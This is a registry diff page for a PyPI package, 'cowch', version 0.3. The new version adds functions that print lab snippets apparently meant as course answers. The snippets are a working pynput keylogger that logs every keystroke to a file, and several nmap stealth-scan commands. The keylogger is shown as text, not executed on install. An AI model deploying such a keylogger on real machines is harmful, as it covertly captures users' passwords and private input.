cowch
Advanced tools
+34
-1
@@ -304,2 +304,35 @@ def pr1(): | ||
| plot(model2) | ||
| """) | ||
| """) | ||
| def eh1(): | ||
| print(""" | ||
| #keylogger | ||
| import pynput | ||
| from pynput.keyboard import Key, Listener | ||
| import logging | ||
| log_dir = r"C:/Users/Admin/Desktop/dd" | ||
| logging.basicConfig(filename = (log_dir + "keyLog.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s') | ||
| def on_press(key): | ||
| logging.info(str(key)) | ||
| with Listener(on_press=on_press) as listener: | ||
| listener.join() | ||
| """) | ||
| def eh2(): | ||
| print(""" | ||
| 1) command :- nmap -sA -T4 scanme.nmap.org | ||
| 2)Command: nmap -p22,113,139 scanme.nmap.org | ||
| 3)Command: nmap -sF -T4 para | ||
| 4)Command: nmap –sN –p 22 scanme.nmap.org | ||
| 5)Command: nmap -sX -T4 scanme.nmap.org | ||
| """) |
+1
-1
| Metadata-Version: 2.1 | ||
| Name: cowch | ||
| Version: 0.2 | ||
| Version: 0.3 | ||
| Summary: This package dosen't make any sense to download | ||
@@ -5,0 +5,0 @@ Home-page: UNKNOWN |
+6
-6
@@ -1,6 +0,6 @@ | ||
| cowch/__init__.py,sha256=f3XR4IB5w44ll7GEvDTlAG_ArJptEMU7S6RmoBVO2kM,7721 | ||
| cowch-0.2.dist-info/License.txt,sha256=jPpqoSyKJrFAxbicO4pTqBZ9GxHXPBwnJhYgUiZFu_0,7 | ||
| cowch-0.2.dist-info/METADATA,sha256=Mj4qYa1kEkMxS57YxhmyQdQ8Pc7kJSMtpkIqcerA3Xw,360 | ||
| cowch-0.2.dist-info/WHEEL,sha256=OqRkF0eY5GHssMorFjlbTIq072vpHpF60fIQA6lS9xA,92 | ||
| cowch-0.2.dist-info/top_level.txt,sha256=2kLQhYjhuvI7s3gM3dUhyswvMObxMLjhIb4kN-bMPng,6 | ||
| cowch-0.2.dist-info/RECORD,, | ||
| cowch/__init__.py,sha256=UBUIcMD6hiboDi-O_senxB6kZ77SyvsWnVc46YRCPnw,8409 | ||
| cowch-0.3.dist-info/License.txt,sha256=jPpqoSyKJrFAxbicO4pTqBZ9GxHXPBwnJhYgUiZFu_0,7 | ||
| cowch-0.3.dist-info/METADATA,sha256=2F-h4LiXt-q5qnhUe4SBqR2e0L9J-CPCS7kT5DYJhEA,360 | ||
| cowch-0.3.dist-info/WHEEL,sha256=OqRkF0eY5GHssMorFjlbTIq072vpHpF60fIQA6lS9xA,92 | ||
| cowch-0.3.dist-info/top_level.txt,sha256=2kLQhYjhuvI7s3gM3dUhyswvMObxMLjhIb4kN-bMPng,6 | ||
| cowch-0.3.dist-info/RECORD,, |
Alert delta unavailable
Currently unable to show alert delta for PyPI packages.